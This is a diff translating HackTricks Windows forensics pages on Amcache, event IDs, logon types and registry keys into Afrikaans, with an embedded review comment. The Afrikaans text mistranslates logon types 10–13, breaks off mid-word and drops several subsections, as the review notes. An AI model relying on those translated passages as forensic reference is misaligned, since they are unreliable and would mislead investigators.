+Om die gestoorde inligting te ontleden, word die [**AppCompatCacheParser**-hulpmiddel](https://github.com/EricZimmerman/AppCompatCacheParser) aanbeveel vir gebruik. ![](<../../../.gitbook/assets/image (488).png>) ### Amcache -The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`. +Die **Amcache.hve**-lêer is in wese 'n registerhys wat besonderhede oor toepassings wat op 'n stelsel uitgevoer is, registreer. Dit word tipies gevind by `C:\Windows\AppCompat\Programas\Amcache.hve`. -This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system. - -To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format: +Hierdie lêer is merkwaardig omdat dit rekords van onlangs uitgevoerde prosesse stoor, insluitend die paaie na die uitvoerbare lêers en hul SHA1-hashes. Hierdie inligting is van onschatbare waarde vir die opspoor van die aktiwiteit van toepassings op 'n stelsel. +Om die data uit **Amcache.hve** te onttrek en te analiseer, kan die [**AmcacheParser**-hulpmiddel](https://github.com/EricZimmerman/AmcacheParser) gebruik word. 
Die volgende opdrag is 'n voorbeeld van hoe om AmcacheParser te gebruik om die inhoud van die **Amcache.hve**-lêer te ontleden en die resultate in CSV-formaat uit te voer: ```bash AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder ``` +Onder die gegenereerde CSV-lêers is die `Amcache_Unassociated file entries` veral merkwaardig vanweë die ryk inligting wat dit verskaf oor nie-geassosieerde lêerinvoere. -Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries. - -The most interesting CVS file generated is the `Amcache_Unassociated file entries`. +Die mees interessante CVS-lêer wat gegenereer word, is die `Amcache_Unassociated file entries`. ### RecentFileCache -This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries. +Hierdie artefak kan slegs in W7 gevind word in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` en dit bevat inligting oor die onlangse uitvoering van sekere bineêre lêers. -You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file. +Jy kan die instrument [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) gebruik om die lêer te ontled. -### Scheduled tasks +### Geskeduleerde take -You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML. +Jy kan hulle onttrek uit `C:\Windows\Tasks` of `C:\Windows\System32\Tasks` en as XML lees. -### Services +### Dienste -You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when. +Jy kan hulle in die register vind onder `SYSTEM\ControlSet001\Services`. Jy kan sien wat uitgevoer gaan word en wanneer. 
### **Windows Store** -The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\ -This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**. +Die geïnstalleerde programme kan gevind word in `\ProgramData\Microsoft\Windows\AppRepository\`\ +Hierdie bewaarplek het 'n **log** met **elke geïnstalleerde toepassing** in die stelsel binne die databasis **`StateRepository-Machine.srd`**. -Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential. +Binne die Toepassingstabel van hierdie databasis is dit moontlik om die kolomme te vind: "Toepassings-ID", "Pakketnommer" en "Vertoonnaam". Hierdie kolomme bevat inligting oor vooraf geïnstalleerde en geïnstalleerde toepassings en dit kan gevind word of sommige toepassings gedeïnstalleer is omdat die ID's van geïnstalleerde toepassings opeenvolgend moet wees. 
-It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ -And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` +Dit is ook moontlik om **geïnstalleerde toepassing** te vind binne die registerpad: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ +En **gedeïnstalleerde** **toepassings** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` -## Windows Events +## Windows-gebeure -Information that appears inside Windows events are: +Inligting wat binne Windows-gebeure verskyn, is: -* What happened -* Timestamp (UTC + 0) -* Users involved -* Hosts involved (hostname, IP) -* Assets accessed (files, folder, printer, services) +* Wat gebeur het +* Tydstempel (UTC + 0) +* Betrokke gebruikers +* Betrokke gasheer (gasheernaam, IP) +* Betrokke bates (lêers, vouer, drukkers, dienste) -The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension. +Die loglêers is geleë in `C:\Windows\System32\config` voor Windows Vista en in `C:\Windows\System32\winevt\Logs` na Windows Vista. Voor Windows Vista was die gebeurtenisloglêers in binêre formaat en daarna is dit in **XML-formaat** en gebruik die **.evtx**-uitbreiding. 
-The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** +Die ligging van die gebeurtenislêers kan gevind word in die SISTEEM-register in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** -They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** +Dit kan gesien word vanuit die Windows-gebeurtenisleser (**`eventvwr.msc`**) of met ander instrumente soos [**Event Log Explorer**](https://eventlogxp.com) **of** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** -## Understanding Windows Security Event Logging +## Begrip van Windows-sekuriteitsgebeure -Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access. +Toegangsgebeure word aangeteken in die sekuriteitskonfigurasie-lêer wat geleë is by `C:\Windows\System32\winevt\Security.evtx`. Hierdie lêer se grootte is aanpasbaar, en wanneer sy kapasiteit bereik is, word ouer gebeure oorskryf. Aangetekende gebeure sluit gebruikersaanmeldings en -afmeldings, gebruikersaksies en veranderinge aan sekuriteitsinstellings in, sowel as toegang tot lêers, vouers en gedeelde bates. -### Key Event IDs for User Authentication: +### Sleutel-gebeurtenis-ID's vir gebruikersverifikasie: -- **EventID 4624**: Indicates a user successfully authenticated. -- **EventID 4625**: Signals an authentication failure. -- **EventIDs 4634/4647**: Represent user logoff events. 
-- **EventID 4672**: Denotes login with administrative privileges. +- **Gebeurtenis-ID 4624**: Dui aan dat 'n gebruiker suksesvol geverifieer is. +- **Gebeurtenis-ID 4625**: Dui op 'n mislukte verifikasie. +- **Gebeurtenis-ID's 4634/4647**: Verteenwoordig gebruikersafmeldingsgebeure. +- **Gebeurtenis-ID 4672**: Dui op aanmelding met administratiewe voorregte. -#### Sub-types within EventID 4634/4647: +#### Subtipes binne Gebeurtenis-ID 4634/4647: -- **Interactive (2)**: Direct user login. -- **Network (3)**: Access to shared folders. -- **Batch (4)**: Execution of batch processes. -- **Service (5)**: Service launches. -- **Proxy (6)**: Proxy authentication. -- **Unlock (7)**: Screen unlocked with a password. -- **Network Cleartext (8)**: Clear text password transmission, often from IIS. -- **New Credentials (9)**: Usage of different credentials for access. -- **Remote Interactive (10)**: Remote desktop or terminal services login. -- **Cache Interactive (11)**: Login with cached credentials without domain controller contact. -- **Cache Remote Interactive (12)**: Remote login with cached credentials. -- **Cached Unlock (13)**: Unlocking with cached credentials. +- **Interaktief (2)**: Direkte gebruikersaanmelding. +- **Netwerk (3)**: Toegang tot gedeelde vouers. +- **Batch (4)**: Uitvoering van lotprosesse. +- **Diens (5)**: Dienslansering. +- **Proxy (6)**: Proxy-verifikasie. +- **Ontsluit (7)**: Skerm ontgrendel met 'n wagwoord. +- **Netwerkduidelike teks (8)**: Duidelike teks wagwoordoordrag, dikwels vanaf IIS. +- **Nuwe legitimasie (9)**: Gebruik van verskillende legitimasie vir toegang. +- **Verwyderde interaktief (10)**: Verwyderde skerm of terminaaldiensaanmelding. +- **Verwyderde interaktiewe opgesluit (11)**: Aanmelding met opgeslote legitimasie sonder kontak met 'n domeinbeheerder. +- **Verwyderde ontgrendeling (12)**: Verwyderde aanmelding met opgeslote legitimasie. +- **Opgeslote ontgrendeling (13)**: Ontsluiting met opgeslote legitimasie. 
-#### Status and Sub Status Codes for EventID 4625: +#### Status- en Substatuskodes vir Gebeurtenis-ID 4625: -- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack. -- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt. -- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins. -- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts. -- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access. -- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location. -- **0xC0000193**: Account expiration - Access attempts with expired user accounts. -- **0xC0000071**: Expired password - Login attempts with outdated passwords. -- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket. -- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security. -- **0xC0000225**: Indicates a system bug rather than a security issue. -- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon. +- **0xC0000064**: Gebruikersnaam bestaan nie - Kan dui op 'n aanval van gebruikersnaamopname. +- **0xC000006A**: Korrekte gebruikersnaam, maar verkeerde wagwoord - Moontlike wagwoord raai of brute force-poging. +- **0xC0000234**: Gebruikersrekening gesluit - Kan volg op 'n brute force-aanval met verskeie mislukte aanmeldings. +- **0xC0000072**: Rekening gedeaktiveer - Onbevoegde pogings om gedeaktiveerde rekeninge te benader. 
+- **0xC000006F**: Aanmelding buite toegelate tyd - Dui op pogings om buite die vasgestelde aanmeldingstye toegang te verkry, 'n moontlike teken van onbevoegde toegang. +- **0xC0000070**: Oortreding van werksplekbeperkings - Kan 'n poging wees om vanaf 'n onbevoegde plek aan te meld. +- **0xC0000193**: Rekening verval - Toegangspogings met vervalde gebruikersrekeninge. +- **0xC0000071**: Vervalde wagwoord - Aanmeldingspogings met verouderde wagwoorde. +- **0xC0000133**: Tydsinkronisasieprobleme - Groot tydverskille tussen kliënt en bediener kan dui op meer gesofistikeerde aanvalle soos pass-the-ticket. +- **0xC0000224**: Verpligte wagwoordverandering vereis - Gereelde verpligte veranderinge kan dui op 'n poging om rekeningsekuriteit te destabiliseer. +- **0xC0000225**: Dui op 'n stelselfout eerder as 'n sekuriteitsprobleem. +- **0xC000015b**: Geweierde aanmeldingstipe - Toegangspoging met onbevoegde aanmeldingstipe, soos 'n gebruiker wat probeer om 'n diensaanmelding uit te voer. -#### EventID 4616: -- **Time Change**: Modification of the system time, could obscure the timeline of events. +#### Gebeurtenis-ID 4616: +- **Tydverandering**: Wysiging van die stelseltyd, kan die tydlyn van gebeure verwar. -#### EventID 6005 and 6006: -- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down. +#### Gebeurtenis-ID's 6005 en 6006: +- **Stelselbegin en -afsluiting**: Gebeurtenis-ID 6005 dui op die begin van die stelsel, terwyl Gebeurtenis-ID 6006 dit aandui wanneer dit afsluit. -#### EventID 1102: -- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities. +#### Gebeurtenis-ID 1102: +- **Logwissing**: Sekuriteitslêers wat skoongevee word, wat dikwels 'n rooi vlag is vir die bedek van onwettige aktiwiteite. -#### EventIDs for USB Device Tracking: -- **20001 / 20003 / 10000**: USB device first connection. -- **10100**: USB driver update. 
-- **EventID 112**: Time of USB device insertion. +#### Gebeurtenis-ID's vir USB-toestelopsporing: +- **20001 / 20003 / 10000**: Eerste koppeling van USB-toestel. +- **10100**: USB-bestuursprogramopdatering. +- **Gebeurtenis-ID 112**: Tyd van USB-toestelinvoeging. -For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). +Vir praktiese voorbeelde van die simulasie van hierdie aanmeldingstipes en geleenthede vir legitimasie-onttrekking, verwys na [Altered Security se gedetailleerde gids](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). -Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625. +Gebeurtenisbesonderhede, insluitend status- en substatuskodes, bied verdere insig in die oorsake van gebeure, ver +#### Stelselkraggebeure -### Recovering Windows Events +EventID 6005 dui op stelselbegin, terwyl EventID 6006 afsluiting aandui. -To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events. +#### Logverwydering -### Identifying Common Attacks via Windows Events - -For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/). - -#### Brute Force Attacks - -Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds. - -#### Time Change - -Recorded by EventID 4616, changes to system time can complicate forensic analysis. 
- -#### USB Device Tracking - -Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps. - -#### System Power Events - -EventID 6005 indicates system startup, while EventID 6006 marks shutdown. - -#### Log Deletion - -Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. +Veiligheid EventID 1102 dui op die verwydering van logboeke, 'n kritieke gebeurtenis vir forensiese analise.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
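Review bot: The logon-type list under "#### Subtipes binne Gebeurtenis-ID 4634/4647" mistranslates types 10 to 13 in a way that changes their meaning: "Remote Interactive (10)" becomes "Verwyderde interaktief" (verwyderde = removed/deleted), "Cache Interactive (11)" becomes "Verwyderde interaktiewe opgesluit", "Cache Remote Interactive (12)" becomes "Verwyderde ontgrendeling" and "Cached Unlock (13)" becomes "Opgeslote ontgrendeling" (opgeslote = locked up, not cached). These are the logon types an analyst relies on to tell RDP and cached-credential logons apart, so suggest "Afgeleë interaktief (10)", "Gekasde interaktief (11)", "Gekasde afgeleë interaktief (12)" and "Gekasde ontsluiting (13)". The heading itself carries a pre-existing error from the English source (logon types are a field of 4624/4625, not of the 4634/4647 logoff events) that the translator could correct in passing. Second, the Windows Events section is truncated: "+Gebeurtenisbesonderhede, insluitend status- en substatuskodes, bied verdere insig in die oorsake van gebeure, ver" stops mid-word, and the English "### Recovering Windows Events", "### Identifying Common Attacks via Windows Events" (with the Red Team Recipe link), "#### Brute Force Attacks", "#### Time Change" and "#### USB Device Tracking" subsections are deleted with no Afrikaans replacement; only "#### Stelselkraggebeure" and "#### Logverwydering" survive, now orphaned under no parent heading. Third, identifiers were translated that should stay verbatim: "SISTEEM-register" (the hive is named SYSTEM), and the quoted StateRepository-Machine.srd column names "Application ID", "PackageNumber" and "Display Name" rendered as "Toepassings-ID", "Pakketnommer" and "Vertoonnaam". Minor: "ontleden", "onschatbare" and "bineêre" are Dutch spellings (Afrikaans: "ontleed", "onskatbare", "binêre"); the image line "![](<../../../.gitbook/assets/image (487).png>)" is dropped without replacement; and the blank lines removed before "+Om hierdie lêers te ondersoek" and "+Jy kan die datum uit hierdie lêer kry" merge those sentences into the preceding paragraph.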
diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 593954531..be12560e8 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -1,106 +1,87 @@ -# Interesting Windows Registry Keys +# Interessante Windows-registernøkke -### Interesting Windows Registry Keys +### Interessante Windows-registernøkke
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### **Windows Version and Owner Info** -- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner. +### **Windows-weergawe en eienaarinligting** +- Onder **`Software\Microsoft\Windows NT\CurrentVersion`** sal jy die Windows-weergawe, dienspakket, installasie-tyd en die geregistreerde eienaar se naam op 'n maklike manier vind. -### **Computer Name** -- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**. +### **Rekenaarnaam** +- Die rekenaarnaam word gevind onder **`System\ControlSet001\Control\ComputerName\ComputerName`**. -### **Time Zone Setting** -- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**. +### **Tydsone-instelling** +- Die stelsel se tydsone word gestoor in **`System\ControlSet001\Control\TimeZoneInformation`**. -### **Access Time Tracking** -- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use: - `fsutil behavior set disablelastaccess 0` +### **Toegangstydopsporing** +- Standaard is die laaste toegangstydopsporing afgeskakel (**`NtfsDisableLastAccessUpdate=1`**). Om dit in te skakel, gebruik: +`fsutil behavior set disablelastaccess 0` -### Windows Versions and Service Packs -- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features. +### Windows-weergawes en dienspakette +- Die **Windows-weergawe** dui die uitgawe aan (bv. Home, Pro) en sy vrystelling (bv. Windows 10, Windows 11), terwyl **dienspakette** opdaterings is wat herstelwerk en soms nuwe funksies insluit. -### Enabling Last Access Time -- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring. 
+### Aktivering van laaste toegangstyd +- Die aktivering van laaste toegangstydopsporing stel jou in staat om te sien wanneer lêers laas geopen is, wat krities kan wees vir forensiese analise of stelselmonitering. -### Network Information Details -- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions. +### Netwerkinligtingbesonderhede +- Die register bevat uitgebreide data oor netwerk-konfigurasies, insluitend **netwerksoorte (draadloos, kabel, 3G)** en **netwerkkategorieë (Openbaar, Privaat/Tuis, Domein/Werk)**, wat belangrik is vir die verstaan van netwerksekuriteitsinstellings en toestemmings. -### Client Side Caching (CSC) -- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity. +### Kliëntkant-caching (CSC) +- **CSC** verbeter die toegang tot lêers buite lyn deur kopieë van gedeelde lêers te kas. Verskillende **CSCFlags**-instellings beheer hoe en watter lêers gekas word, wat die prestasie en gebruikerservaring beïnvloed, veral in omgewings met onderbroke konnektiwiteit. -### AutoStart Programs -- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software. +### Outomatiese beginprogramme +- Programme wat in verskillende `Run`- en `RunOnce`-registernøkke gelys word, word outomaties by opstart geloods, wat die stelselopstarttyd beïnvloed en moontlik punte van belang kan wees om kwaadwillige sagteware of ongewenste sagteware te identifiseer. 
### Shellbags -- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means. +- **Shellbags** stoor nie net voorkeure vir vouer-aansigte nie, maar verskaf ook forensiese bewyse van vouertoegang selfs as die vouer nie meer bestaan nie. Dit is van onskatbare waarde vir ondersoeke en onthul gebruikersaktiwiteit wat nie duidelik is deur ander middels nie. -### USB Information and Forensics -- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents. +### USB-inligting en forensika +- Die besonderhede wat in die register oor USB-toestelle gestoor word, kan help om vas te stel watter toestelle aan 'n rekenaar gekoppel was, moontlik 'n toestel aan gevoelige lêeroordragte of ongemagtigde toegangsgevalle te koppel. -### Volume Serial Number -- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices. +### Volume-seriëlenommer +- Die **Volume-seriëlenommer** kan van kritieke belang wees vir die opsporing van die spesifieke instansie van 'n lêersisteem, wat nuttig is in forensiese scenario's waar lêeroorsprong oor verskillende toestelle vasgestel moet word. -### **Shutdown Details** -- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**. +### **Afsluitingsbesonderhede** +- Afsluitingstyd en telling (laasgenoemde slegs vir XP) word in **`System\ControlSet001\Control\Windows`** en **`System\ControlSet001\Control\Watchdog\Display`** gehou. 
-### **Network Configuration** -- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. -- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. +### **Netwerk-konfigurasie** +- Vir gedetailleerde netwerkinterface-inligting, verwys na **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. +- Eerste en laaste netwerkverbindings-tye, insluitend VPN-verbindings, word gelog onder verskillende paaie in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. -### **Shared Folders** -- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability. +### **Gedeelde vouers** +- Gedeelde vouers en instellings is onder **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Kliëntkant-caching (CSC) instellings bepaal die beskikbaarheid van lêers buite lyn. -### **Programs that Start Automatically** -- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup. +### **Programme wat outomaties begin** +- Paaie soos **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** en soortgelyke inskrywings onder `Software\Microsoft\Windows\CurrentVersion` beskryf programme wat by opstart ingestel is om uit te voer. -### **Searches and Typed Paths** -- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively. 
+### **Soektogte en getikte paaie** +- Ontdekkingsreisiger-soektogte en getikte paaie word in die register onder **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** vir WordwheelQuery en TypedPaths, onderskeidelik, gevolg. -### **Recent Documents and Office Files** -- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths. +### **Onlangse dokumente en Office-lêers** +- Onlangse dokumente en Office-lêers wat geopen is, word aangeteken in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` en spesifieke Office-weergawepaaie. -### **Most Recently Used (MRU) Items** -- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`. +### **Mees onlangs gebruikte (MRU) items** +- MRU-lyste, wat onlangse lêerpaaie en opdragte aandui, word gestoor in verskillende `ComDlg32`- en `Explorer`-subnøkke onder `NTUSER.DAT`. -### **User Activity Tracking** -- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +### **Gebruikersaktiwiteitopsporing** +- Die Gebruikerhulp-funksie hou gedetailleerde toepassingsgebruikstatistieke by, insluitend uitvoertelling en laaste uitvoertyd, by **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. -### **Shellbags Analysis** -- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis. +### **Shellbags-analise** +- Shellbags, wat vouertoegangsdetails onthul, word gestoor in `USRCLASS.DAT` en `NTUSER.DAT` onder `Software\Microsoft\Windows\Shell`. 
Gebruik **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** vir analise. -### **USB Device History** -- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps. -- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**. -- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively. - -This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. - - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
